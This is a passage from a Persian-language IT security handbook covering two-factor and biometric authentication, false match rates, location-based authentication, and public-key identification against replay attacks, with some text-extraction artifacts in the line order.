‫ﻻ ﺗﺤﺖ ﻋﻨﻮﺍﻥ "ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭ ﻋﺎﻣﻠﻲ" ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴـﺮﺩ‪.‬‬
‫ﺑﻌﻀﻲ ﺍﺯ ﺍﺑﺰﺍﺭ ﺩﻳﮕﺮ ﺷﻨﺎﺳﺎﻳﻲ ﺁﻣﻴﺨﻪ ﻣﻲﺷﻮﺩ ﮐﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺍﺗﺎﻕ ﻳﺎ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﻫﻢ ﻳﻚ ﻧﺸﺎﻥ ﺍﺭﺍﺋﻪ ﻛﻨﻴﺪ ﻭ ﻫﻢ ﻳﻚ ﺭﻣﺰ ﺗـﺼﺪﻳﻖ ﺍﻋﺘﺒـﺎﺭ‬
‫ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻳﻦ ﺗﻜﻨﻴﻜﻲ ﺍﺳﺖ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺗـﺸﺨﻴﺺ ﺻـﺎﺣﺒﺎﻥ ﺣـﺴﺎﺑﻬﺎﻱ ﺑـﺎﻧﻜﻲ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﮐﻨﻨﺪ‪.‬‬
‫‪٣١٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﭼﻮﻥ ﺑﺮ ﺍﺳﺎﺱ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﭼﻴﺰﻱ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺷﺨﺺ ﺯﻧﺪﻩ ﺍﺳﺖ‪ .‬ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﻧـﻮﺍﻉ ﻣﺨﺘﻠﻔـﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪ ،‬ﻣﺜـﻞ‬
‫ﺗﺼﺎﻭﻳﺮ ﺻﻮﺭﺕ‪ ،‬ﺷﺒﻜﻴﻪ‪ ،‬ﻋﻨﺒﻴﻪ‪ ،‬ﺍﺛﺮ ﺍﻧﮕﺸﺖ‪ ،‬ﺷﻜﻞ ﻫﻨﺪﺳﻲ ﺩﺳﺖ‪ ،‬ﺣﺎﻟﺖ ﺻﺪﺍ‪ ،‬ﺩﺳﺘﺨﻂ‪ ،‬ﻣﺸﺨﺼﺎﺕ ﺗﺎﻳﭗ‪ ،‬ﻭ ﻳﺎ ﺍﻟﮕﻮﻫﺎﻱ ‪.DNA‬‬
‫ﻓﻨﻮﻥ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﻫﺮ ﺩﻭ ﻣﻮﺭﺩ "ﺗﺸﺨﻴﺺ ﺑﻌﺪﻱ" ﻭ ﻧﻴﺰ "ﺗﺸﺨﻴﺺ ﻗﻄﻌـﻲ" ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻓﻨﻮﻥ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﺑﻌﺪﻱ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ‪ :‬ﺍﻭﻟﻴﻦ ﺑﺎﺭﻱ ﻛﻪ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﺳﻴـﺴﺘﻢ ﻣـﻲﺷـﻮﺩ ﺍﻃﻼﻋـﺎﺕ ﺑﻴﻮﻣﺘﺮﻳـﻚ ﺍﻭ ﺛﺒـﺖ‬
‫ﻼ ﺛﺒﺖ ﺷـﺪﻩ ﻣﻘﺎﻳـﺴﻪ ﻣـﻲﮔـﺮﺩﺩ‪ .‬ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺯﻳـﺴﺘﻲ ﺩﺭ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭ ﻭﺭﻭﺭﺩﻫﺎﻱ ﺑﻌﺪﻱ‪ ،‬ﺑﻴﻮﻣﺘﺮﻳﻚ ﺟﺪﻳﺪ ﺑﺎ ﺁﻧﭽﻪ ﻗﺒ ﹰ‬
‫ﺗﺸﺨﻴﺺ ﻗﻄﻌﻲ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺑﺰﺭﮒ ﺑﺮﺍﻱ ﺗﻨﺎﻇﺮ ﻧﺎﻣﻬﺎ ﺑﺎ ﺑﻴﻮﻣﺘﺮﻳﻚﻫﺎ ﺍﻳﺠﺎﺩ ﺷﻮﺩ‪ .‬ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤـﺪﻩ‪ ،‬ﭘﻠـﻴﺲ ﻓـﺪﺭﺍﻝ‬
‫ﺁﻣﺮﻳﻜﺎ )‪ (FBI‬ﺑﻪ ﭼﻨﻴﻦ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻣﺠﻬﺰ ﺍﺳﺖ ﻛﻪ ﻳﻜﻲ ﺍﺳﺎﻣﻲ ﺭﺍ ﺑﺎ ﺍﺛﺮ ﺍﻧﮕﺸﺘﺎﻥ ﻭ ﺩﻳﮕﺮﻱ ﺑﺎ ﻋﻨﺎﺻﺮ ‪ DNA‬ﺗﻄﺒﻴﻖ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭ ﻧﺸﺎﻧﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﺩﻭ ﻣﺰﻳﺖ ﻭﺍﺿﺢ ﺩﺍﺭﺩ‪ .‬ﺁﻧﻬﺎ ﻓﺮﺍﻣﻮﺵ ﻭ ﻳﺎ ﮔﻢ ﻧﻤﻲﺷـﻮﻧﺪ‪،‬‬
‫ﻭ ﺑﺮﺍﺣﺘﻲ ﻧﻴﺰ ﻗﺎﺑﻞ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺘﻦ‪ ،‬ﻛﭙﻲﺑﺮﺩﺍﺭﻱ‪ ،‬ﻭ ﻳﺎ ﺳﺮﻗﺖ ﻧﻤﻲﺑﺎﺷﻨﺪ‪ .‬ﻭﻟﻲ ﺍﻧﺘﻘﺎﻝ ﺗﻜﻨﻮﻟﻮﮊﻱ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺍﺯ ﺁﺯﻣﺎﻳﺸﮕﺎﻫﻬﺎ ﺑﻪ ﺳﻄﺢ‬
‫ﺑﺎﺯﺍﺭ ﻣﺸﻜﻞ ﺍﺳﺖ‪ .‬ﺩﺭ ﻫﻤﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺳﻄﺢ ﻣﻌﻴﻨﻲ ﺍﺯ ‪) False Positive‬ﺍﺷـﺘﺒﺎﻩ ﻣﺜﺒـﺖ( ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻛـﻪ ﺩﺭ ﺁﻥ ﺳﻴـﺴﺘﻢ‬
‫ﺗﻄﺒﻴﻘﻲ ﺭﺍ ﻛﻪ ﻧﺒﺎﻳﺪ ﺍﻋﻼﻡ ﻛﻨﺪ‪ ،‬ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ‪ .‬ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ‪) False Negative‬ﺍﺷﺘﺒﺎﻩ ﻣﻨﻔﻲ( ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻛﻪ ﺩﺭ ﺁﻥ ﺳﻴﺴﺘﻢ‬
‫ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﻭ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺍﺯ ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ ﻫﺴﺘﻨﺪ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﺯ ﻳﻚ ﺷﺨﺺ ﻭﺍﺣﺪ ﻣﻲﺑﺎﺷـﻨﺪ‪ .‬ﺑـﺮﺍﻱ ﻛـﺎﻫﺶ ﺍﻣﻜـﺎﻥ ﺗﻄﺒﻴﻘﻬـﺎﻱ‬
‫ﻻ ﺍﺯ‬
‫ﺍﺷﺘﺒﺎﻩ‪ ،‬ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻴﻮﻣﺘﺮﻳﻚ‪ ،‬ﻣﻌﻴﺎﺭ ﺯﻳﺴﺘﻲ ﺭﺍ ﺑﺎ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻳﺎ ﻧﺸﺎﻥ ﺗﺮﻛﻴﺐ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺭ ﻣﻮﺭﺩ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻣﻌﻤـﻮ ﹰ‬
‫ﻛﺎﺭﺑﺮ ﺧﻮﺍﺳﺘﻪ ﻣﻲﺷﻮﺩ ﮐﻪ ﻳﻚ ﻛﺪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﺨﻔﻲ ﻣﺜﻞ ‪ PIN‬ﺭﺍ ﺗﺎﻳﭗ ﻛﻨﺪ ﻭ ﺳﭙﺲ ﻳﻚ ﻧﻤﻮﻧﺔ ﺑﻴـﻮﻣﺘﺮﻳﻜﻲ‪ ،‬ﻣﺜـﻞ ﺣﺎﻟـﺖ ﺻـﺪﺍﻳﺶ ﺭﺍ‬
‫ﺍﺭﺍﺋﻪ ﺩﻫﺪ‪ .‬ﺳﻴﺴﺘﻢ ﺍﺯ ﺁﻥ ﮐﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﻳﻚ ﭘﺮﻭﻧﺪﺓ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺭﺍ ﺑﺎ ﺍﻟﮕﻮﻱ ﺫﺧﻴﺮﻩﺷـﺪﻩ‬
‫ﻣﻘﺎﻳﺴﻪ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ‪ ،‬ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺭﺍ ‪ -‬ﺑﺠﺎﻱ ﺗﻤﺎﻡ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ ‪ -‬ﺑـﺎ ﺗﻨﻬـﺎ ﻳﻜـﻲ ﺍﺯ ﻣﻘـﺎﺩﻳﺮ ﻣﻌﻴﺎﺭﻫـﺎﻱ‬
‫ﺫﺧﻴﺮﻩﺷﺪﻩ ﻣﻘﺎﻳﺴﻪ ﻛﻨﺪ‪.‬‬
‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﺯﻳﺴﺘﻲ ﺩﻗﻴﻖ ﻧﻴﺴﺘﻨﺪ؛ ﭼﺮﺍﮐﻪ‪:‬‬
‫• ﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺷﺨﺺ ﺑﺨﻮﺍﻫﺪ ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮﺩ‪ ،‬ﻣﺸﺨﺼﺎﺕ ﺑﻴﻮﻣﺘﺮﻳﻜﻲ ﻭﻱ ﺑﺎﻳﺪ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺭﺍﻳﺎﻧﻪ ﺑﺎﺷﺪ؛‬
‫• ﺍﮔﺮ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﻣﺸﺨﺼﻪﻫﺎﻱ ﺑﻴﻮﻣﺘﺮﻳﻜﻲ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ ،‬ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮ ﺍﺳﺎﺱ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺑﻲﺍﺭﺯﺵ ﺧﻮﺍﻫﺪ ﺷﺪ؛ ﻭ‬
‫• ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺍﻧﺪﺍﺯﻩﮔﻴﺮﻱ ﺑﻄﻮﺭ ﺧﺎﺹ ﺣﻔﺎﻇﺖ ﻧﺸﻮﺩ‪ ،‬ﺗﺠﻬﻴﺰﺍﺕ ﻧﺴﺒﺖ ﺑﻪ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﻭ ﺗﺤﺮﻳﻒ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺧﻮﺍﻫﻨﺪ ﺑـﻮﺩ‪.‬‬
‫ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻳﻚ ﺩﺯﺩ ﺑﺎﻫﻮﺵ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﻳﻚ ﺳﻴﺴﺘﻢ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺮ ﺍﺳﺎﺱ ﺻـﺪﺍ‪ ،‬ﺑﺘﻮﺍﻧـﺪ ﺑـﺎ ﺿـﺒﻂ ﻛـﺮﺩﻥ ﺻـﺪﺍﻱ‬
‫ﺷﺨﺺ ﻣﺠﺎﺯ )ﻭﻗﺘﻲ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻣﻲﮔﻮﻳـﺪ(‪ ،‬ﺑﺎﺯ ﮔﺮﺩﺍﻧﺪﻥ ﻧﻮﺍﺭ ﺑﻪ ﻋﻘﺐ‪ ،‬ﻭ ﺳﭙﺲ ﭘﺨﺶ ﻣﺠﺪﺩ ﺻﺪﺍﻱ ﺿﺒﻂ ﺷـﺪﻩ‪ ،‬ﺁﻥ ﺳﻴـﺴﺘﻢ ﺭﺍ‬
‫ﻓﺮﻳﺐ ﺩﻫﺪ‪.‬‬
‫ﻣﻜﺎﻥ‪ :‬ﺟﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻳﺪ‬
‫ﺑﺎ ﺗﻮﺳﻌﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺼﻮﺭﺗﻴﻜﻪ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺘﻮﺍﻧﻨﺪ ﻣﺤﻞ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺭﺍ ﻣﻌـﻴﻦ ﻛﻨﻨـﺪ‪ ،‬ﺍﻣـﺮﻭﺯﻩ ﺍﺳـﺘﻘﺮﺍﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻮﻗﻌﻴﺖ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺍﺳﺖ‪ .‬ﺍﮔﺮﭼﻪ ﺳﻴﺴﺘﻢ ﻣﻮﻗﻌﻴﺖﻳﺎﺏ ﺟﻬﺎﻧﻲ )‪ ١٢٩(GPS‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺍﻃﻼﻋـﺎﺕ ﻣﺤـﻞ‬
‫ﻻ ﺩﺭ ﺍﺗﺎﻗﻬـﺎﻱ ﺩﺭﺑـﺴﺘﻪ ﻛـﺎﺭ‬
‫ﺑﻜﺎﺭ ﺭﻭﺩ‪ ،‬ﺍﻣﺎ ﺩﻭ ﻣﺎﻧﻊ ﺟﺪﻱ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ GPS‬ﺩﺭ ﺍﻳﻦ ﻛﺎﺭﺑﺮﺩ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ :‬ﻳﻜـﻲ ﺍﻳﻨﻜـﻪ ‪ GPS‬ﻣﻌﻤـﻮ ﹰ‬
‫ﻧﻤﻲﻛﻨﺪ‪ ،‬ﻭ ﺩﻳﮕﺮ ﺍﻳﻨﻜﻪ ﻫﻴﭻ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﺍﻳﻤﻦ ﺍﻃﻼﻋﺎﺕ ﻣﻜﺎﻧﻲ ﺍﺯ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ‪ GPS‬ﺑﻪ ﺳﺮﻭﻳﺲ ﺭﺍﻩ ﺩﻭﺭ ﻛـﻪ ﺑﺎﻳـﺪ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﺻﺤﺖ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﺪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﻳﻚ ﺍﻧﺘﺨﺎﺏ ﺑﻬﺘﺮ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺒﺘﻨﻲ ﺑـﺮ ﻣﻮﻗﻌﻴـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺧـﺪﻣﺎﺕ ﻣﻜـﺎﻧﻲ‬
‫)ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻮﻗﻌﻴـﺖ( ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺗﻮﺳﻂ ﺑﻌﻀﻲ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻱ ﺗﻠﻔﻦ ﻣﻮﺑﺎﻳﻞ ﺍﺳﺖ‪ .‬ﺑﺎ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺷﺒﻜﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻜـﺎﻥ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺗـﺸﺨﻴﺺ‬
‫ﺩﻫﺪ ﻭ ﺳﭙﺲ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﻣﺮﻛﺰ ﺧﺪﻣﺎﺕ ﮔﺰﺍﺭﺵ ﻛﻨﺪ‪ ،‬ﺑﺪﻭﻥ ﻧﮕﺮﺍﻧﻲ ﺍﺯ ﺍﻣﻜﺎﻥ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻫﻨﮕﺎﻡ ﺍﻧﺠﺎﻡ ﺷﺪﻥ ﻋﻤﻠﻴﺎﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ‪.‬‬
‫‪129 Geographical Positioning System‬‬
‫‪٣١٧‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﻳﻚ ﺷﻜﻞ ﺳﺎﺩﺓ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺮ ﺍﺳﺎﺱ ﻣﺤﻞ‪ ،‬ﺩﺍﺷﺘﻦ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﭘﺎﻳﺎﻧﺔ ﻣﺨﺼﻮﺻﻲ ﺍﺳﺖ ﻛﻪ ﻣﺠﺎﺯ ﺑﻪ ﺍﺟﺮﺍﻱ ﻳﻚ ﻋﻤـﻞ ﺧـﺎﺹ ﺑﺎﺷـﺪ‪.‬‬
‫ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﺩﻳﮕﺮ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺍﺯ ﺩﺍﺷﺘﻦ ﭼﻨﻴﻦ ﺍﻣﺘﻴﺎﺯﺍﺗﻲ ﻣﺤﺮﻭﻡ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪ .‬ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ‪" ،‬ﻣﻮﻗﻌﻴﺖ" ﻫﻨﻮﺯ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ‬
‫ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻜﺎﺭ ﻧﺮﻓﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ‬
‫ﺗﻜﻨﻴﻜﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻪ ﭘﻴﺸﺘﺮ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷﺪ ﻫﻤﻪ ﺩﺍﺭﺍﻱ ﻳﻚ ﻧﻘﺺ ﻣﺸﺘﺮﻙ ﻫﺴﺘﻨﺪ‪ :‬ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﻳـﻚ ﻓـﺮﺩ‬
‫ﺑﺼﻮﺭﺕ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ‪ ،‬ﺁﻥ ﺷﺨﺺ ﺑﺎﻳﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺨﺼﻲ ﻛﻪ ﻋﻤﻠﻴﺎﺕ ﺷﻨﺎﺳﺎﻳﻲ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ ﺣﺎﺿﺮ ﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ﺁﻥ ﺷﺨﺺ‬
‫ﺣﺎﺿﺮ ﻧﺒﺎﺷﺪ ‪ -‬ﺍﮔﺮ ﺷﻨﺎﺳﺎﻳﻲ ﺑﻮﺳﻴﻠﻪ ﺗﻠﻔﻦ‪ ،‬ﻓﺎﻛﺲ‪ ،‬ﻭ ﻳﺎ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ ‪ -‬ﺑﺪﻟﻴﻞ ﺍﻣﻜﺎﻥ ﻭﻗﻮﻉ "ﺣﻤﻼﺕ ﺗﻜﺮﺍﺭ"‪ ،‬ﺍﺣﺘﻤـﺎﻝ‬
‫ﺗﺤﺮﻳﻒ ﻭ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺴﻴﺎﺭ ﺑﺎﻻﺳﺖ‪.‬‬
‫ﻣﻮﻗﻌﻴﺘﻲ ﺭﺍ ﺗﺼﻮﺭ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺍﺛﺮ ﺍﻧﮕﺸﺖ ﻛﺎﺭﺑﺮ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﻨﺪ ﻭ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮﻱ ﻋﻤﻠﻴﺎﺕ ﺍﺭﺯﻳﺎﺑﻲ ﺻﺤﺖ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻛﺪ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺛﺮ ﺍﻧﮕـﺸﺖ ﺭﺍ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺍﺯ ﺭﻭﻱ ﺷـﺒﻜﻪ ﻣﻨﺘﻘـﻞ ﻣـﻲﺷـﻮﺩ ﺑـﺪﺯﺩﺩ‪.‬‬
‫ﻫﻤﻴﻨﻜﻪ ﻣﻬﺎﺟﻢ ﺍﻧﺘﻘﺎﻝ ﺍﺛﺮ ﺍﻧﮕﺸﺖ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﮔﺮﻓﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺟﻌﻞ ﻫﻮﻳﺖ ﻗﺮﺑﺎﻧﻲ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨـﺪ‪ .‬ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﮔﻔﺘـﻪ ﺷـﺪ‬
‫ﺣﻤﻠﻪﻫﺎﻱ ﺗﻜﺮﺍﺭ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻳﻚ ﺗﻬﺪﻳﺪ ﺟﺪﻱ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺸﺨﻴﺺ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ‪.‬‬
‫ﮔﻔﺘﻴﻢ ﻛﻪ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺣﺘﻤﺎﻝ ﺧﻄﺮ ﺣﻤﻼﺕ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﺪ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗـﺸﺨﻴﺺ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻣﻀﺎ ﻭ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﺁﻥ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﭼـﻮﻥ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ﻫﻴﭽﮕـﺎﻩ ﺍﺯ‬
‫ﻣﺎﻟﻜﻴﺖ ﺷﺨﺼﻲ ﻛﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﺩ ﺧﺎﺭﺝ ﻧﻤﻲﮔﺮﺩﺩ ‪ -‬ﻭ ﻟﺬﺍ ﻫﻴﭽﮕﺎﻩ ﺭﻭﻱ ﺳﻴﻢ ﻓﺮﺳﺘﺎﺩﻩ ﻧﻤﻲﺷﻮﺩ ‪ -‬ﻫـﻴﭻ ﻓﺮﺻـﺘﻲ ﺑـﺮﺍﻱ ﻣﻬـﺎﺟﻢ‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺪﺯﺩﺩ ﻭ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﺷﻮﻡ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪.‬‬
